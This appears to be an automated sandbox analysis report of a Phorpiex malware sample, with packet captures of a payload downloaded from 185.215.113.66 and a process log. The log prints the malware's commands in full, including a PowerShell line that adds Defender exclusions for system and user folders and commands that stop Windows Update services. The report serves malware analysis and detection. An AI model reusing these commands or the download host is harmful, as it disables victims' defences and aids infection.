                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541013956 CEST636INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                                                                                    Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541024923 CEST1236INData Raw: db 50 63 f8 80 90 b7 d5 28 27 c1 d4 b5 ce 22 4e eb 54 89 33 55 18 0d 11 14 3f 41 7d aa 8f 3f 0c 6d 0f 9b 8b de a8 1f 5f a1 bc 9d ee 3e 83 a9 00 9b 93 a8 e4 90 b0 73 6d 56 6d 9d 6d 8f 37 81 9b ae f6 34 eb 1e 74 4d 5a 02 f3 d6 8b a2 53 be e1 80 e4
                                                                                                                                                                                                    Data Ascii: Pc('"NT3U?A}?m_>smVmm74tMZS-GJ0RCw\FP&_+[2`,#:sVtVtNkos]>@[2UJ3"RtJYzXSg{)]S}|{v
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541037083 CEST212INData Raw: 22 64 54 81 b1 84 d5 e6 7e 80 9c 16 34 16 50 f5 f8 44 83 cb ac 4b 79 5c 4d ae c2 49 f8 38 6b 19 a6 11 89 67 a6 b9 95 f4 79 dc 24 22 8b bb d6 f2 01 ea ac e3 3f d9 dd 75 48 f0 42 bb d4 d1 33 8a 91 47 d1 18 9d ac 52 cc 48 28 9d bf e6 ec 9c 3a 35 94
                                                                                                                                                                                                    Data Ascii: "dT~4PDKy\MI8kgy$"?uHB3GRH(:5N:AYovR[tn:;3or+[y<_%Q(gUb7D]%GB`8D;Ygh&xtN%*.I
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541047096 CEST1236INData Raw: e5 c7 48 fe 8e a5 32 e2 13 dd d2 2d 64 e7 e9 5c 6b 43 03 19 ca a8 00 64 ff 18 b9 f1 9d 4d d7 74 8b a0 5f 02 8f 37 31 12 8f 13 05 52 05 c3 aa 57 33 76 99 c9 a7 4c 1d 6e ef 86 cd 0c eb a3 b1 70 2a 37 e3 66 ec 2b 49 77 ef cf bf ce fb 36 71 50 84 c7
                                                                                                                                                                                                    Data Ascii: H2-d\kCdMt_71RW3vLnp*7f+Iw6qPRvW*fKA+SjAn3'>N.KD"A#1a"!(?$|%=e` 7ODu0Wn+NOayTvnB[4=}B!AS]v6jZD*&
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541059017 CEST212INData Raw: 2c ab a3 cb d3 d0 3b 48 ce 82 47 e8 01 6a cb db 94 a0 28 22 bb 49 f9 b3 d0 1e 4d 95 f8 48 88 81 e5 bc fb a8 de 10 1e 4d 86 3b 9d 22 c8 43 13 0a f6 0b 83 2a 40 3d 1e 6a 0b 90 01 d5 75 07 c4 a7 d8 73 9a 25 d4 87 54 8b 4f 20 f1 0b e3 71 55 5c 0c 60
                                                                                                                                                                                                    Data Ascii: ,;HGj("IMHM;"C*@=jus%TO qU\`kqz(d];N_v3CM<k#Hd-_qoMx-Uy`r(4#f||ZL!eyhK
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541069031 CEST1236INData Raw: 18 e9 fa d0 90 1c bb a0 3f 37 06 f9 df 01 49 ce 19 58 a4 8e c3 69 68 1c 19 03 32 25 45 f7 a1 b0 d3 2b 83 68 4a 20 3f 4f 8e f6 37 4f 97 c2 11 f9 07 00 95 eb 48 d7 61 59 ae 4b 8e 79 b8 98 b5 1b a9 e5 4c 2e 24 4c 44 78 c4 1f 3d 03 bc 3e c9 d8 2e 67
                                                                                                                                                                                                    Data Ascii: ?7IXih2%E+hJ ?O7OHaYKyL.$LDx=>.gAiwVjFp7s ;emO+"/;B`\K%G}=B,S%hQB94Q@KYRE6uPb^&Q.u
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.541079044 CEST212INData Raw: fc 26 fb 9e 43 0d 1c 90 b5 27 8d 99 84 ac c8 58 65 5e 0f ef 58 0d 06 2e b5 11 99 74 14 a2 d9 e1 7e 3e a0 17 80 2c f4 a5 6c 6d 68 50 41 03 7e 46 d6 d1 45 95 13 ea bc b1 b8 8f a5 c1 77 4f be 55 7b 7c 69 b5 1a d9 17 a2 d9 31 0e 4d 8a 8c 6e 4d c4 58
                                                                                                                                                                                                    Data Ascii: &C'Xe^X.t~>,lmhPA~FEwOU{|i1MnMXf{KE&.@0/:asZ>S+<h:!|(0+u'MY&{iD^E-F{E~*\}GIQM
                                                                                                                                                                                                    Oct 26, 2024 07:28:43.546693087 CEST1236INData Raw: e5 ae 25 df c2 a8 ea 78 b4 2b de 24 76 83 e9 28 bd 6a c1 b9 99 9e 30 46 02 98 38 3e 82 1b 07 44 35 26 bd 09 6d 26 96 e4 dd f6 ed 1d 1a 17 c3 df 71 ce 79 98 41 01 00 bb c5 57 d5 f1 c4 53 3c df 49 96 8d 65 39 df a9 0b 89 bc e8 18 5e b7 ea 30 af be
                                                                                                                                                                                                    Data Ascii: %x+$v(j0F8>D5&m&qyAWS<Ie9^0#8-PKY#"3T>G(~/ldX5rO6fPtL[^8R~_RPc-#YM(NKhE;`'1!2M{


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    32192.168.2.854606185.215.113.6680
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:28:45.579850912 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521729946 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:28:46 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 8960
                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "671230ee-2300"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521750927 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                                    Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521763086 CEST1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                                                                    Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521775961 CEST1236INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                                                                                    Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521787882 CEST1236INData Raw: f3 c6 cf f8 95 24 43 84 1e 1f 9b 9c d9 67 06 dc 57 43 c0 ff d4 c9 b4 19 52 67 b0 40 5c 8f 00 ab 9d ff 39 47 b4 07 78 4f 3d ea 81 53 76 ad 4d 76 16 a5 b7 2e e5 b9 6d 89 3c f6 9f 00 cc a4 9a b7 cc 8f b1 36 f8 1a e3 38 6a df fd 09 9e 74 6f 47 14 bc
                                                                                                                                                                                                    Data Ascii: $CgWCRg@\9GxO=SvMv.m<68jtoG M,"p-R6(=6;BS)2Mq#+dM1;oyAzm@!<Enk ?C=|9PednGDF%F-_!Y^uODIuH"oR^k=%
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521800041 CEST1236INData Raw: 94 04 da 8e d4 c0 98 3e 24 6d 01 7b 78 3d 57 2b 8b 06 77 55 2d 93 2b 04 bb 96 97 82 3d 6b 0f a9 c8 ef 2f e2 ce 5d 74 af 33 db 0c 35 3d f4 cd c7 65 c3 05 79 78 24 ce f4 a6 99 58 93 43 df f2 17 d2 12 2f 0c c1 a0 51 33 10 28 3d c5 a6 ec 61 a7 46 c8
                                                                                                                                                                                                    Data Ascii: >$m{x=W+wU-+=k/]t35=eyx$XC/Q3(=aFS3RJr^{@[W\)9f>F}+V1*p0RQO{jwdL0_2}hGn[>q>a r{tVJ0sN]Q\-#6npc`
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521811962 CEST1236INData Raw: d3 90 d1 fd d7 07 74 76 fe e7 1d df 46 a6 78 b3 3b 32 6d d7 75 d6 e6 a1 f8 ad 93 84 f2 7f 70 fa 89 4b 36 27 09 96 bc b1 c7 59 94 41 08 18 1d 5f 62 ee ed a0 2c 51 1b 21 fd cb 69 5e 5b 4f 79 a3 18 ee 3b 5f a3 09 af 9e 3b d6 57 f1 8e a7 51 41 72 bb
                                                                                                                                                                                                    Data Ascii: tvFx;2mupK6'YA_b,Q!i^[Oy;_;WQAr_2H}/%~.6*rjk>DQgo_7}-)i&O%[u{zhaRIN9<[C&WK,+-27}#hH?FDr2Ey#s
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521821022 CEST572INData Raw: 55 e5 ce d3 04 5e db d4 1d 7b f1 54 f1 b2 98 ad 4d 05 61 bb 44 52 dc d6 71 c2 cd 92 2d bb 49 dd a2 94 56 b2 b2 25 da 20 db e3 b2 38 79 3f fa da 49 f5 48 08 d8 37 e6 42 37 9c 23 52 b2 14 9d 3f 51 1c 92 66 1d 0c 45 5e a7 ad b6 d4 a1 fd 2f f0 9f f8
                                                                                                                                                                                                    Data Ascii: U^{TMaDRq-IV% 8y?IH7B7#R?QfE^/CWIyjuk&x9a6TQ)t!)z[c=FR"#{'qd(;I0}<l#%/0>$L%j,6SpcqFjAc0%GhGci,g


                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:01:26:23
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\lJ4EzPSKMj.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\lJ4EzPSKMj.exe"
                                                                                                                                                                                                    Imagebase:0xa90000
                                                                                                                                                                                                    File size:79'872 bytes
                                                                                                                                                                                                    MD5 hash:93AC88B5786CC524A9668AB13C73584F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.1532857494.000000000132C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:01:26:28
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\5232.scr
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\5232.scr" /S
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:85'504 bytes
                                                                                                                                                                                                    MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\5232.scr, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:01:26:30
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:85'504 bytes
                                                                                                                                                                                                    MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:sc stop UsoSvc
                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:sc stop WaaSMedicSvc
                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:01:26:34
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:sc stop wuauserv
                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                    Start time:01:26:35
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:sc stop DoSvc
                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:01:26:35
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:sc stop BITS /wait
                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                                                    MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:01:26:40
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Windows\sysppvrdnvs.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:85'504 bytes
                                                                                                                                                                                                    MD5 hash:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\513318274.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\513318274.exe
                                                                                                                                                                                                    Imagebase:0xa50000
                                                                                                                                                                                                    File size:8'704 bytes
                                                                                                                                                                                                    MD5 hash:CB8420E681F68DB1BAD5ED24E7B22114
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 75%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                    Start time:01:26:51
                                                                                                                                                                                                    Start date:26/10/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
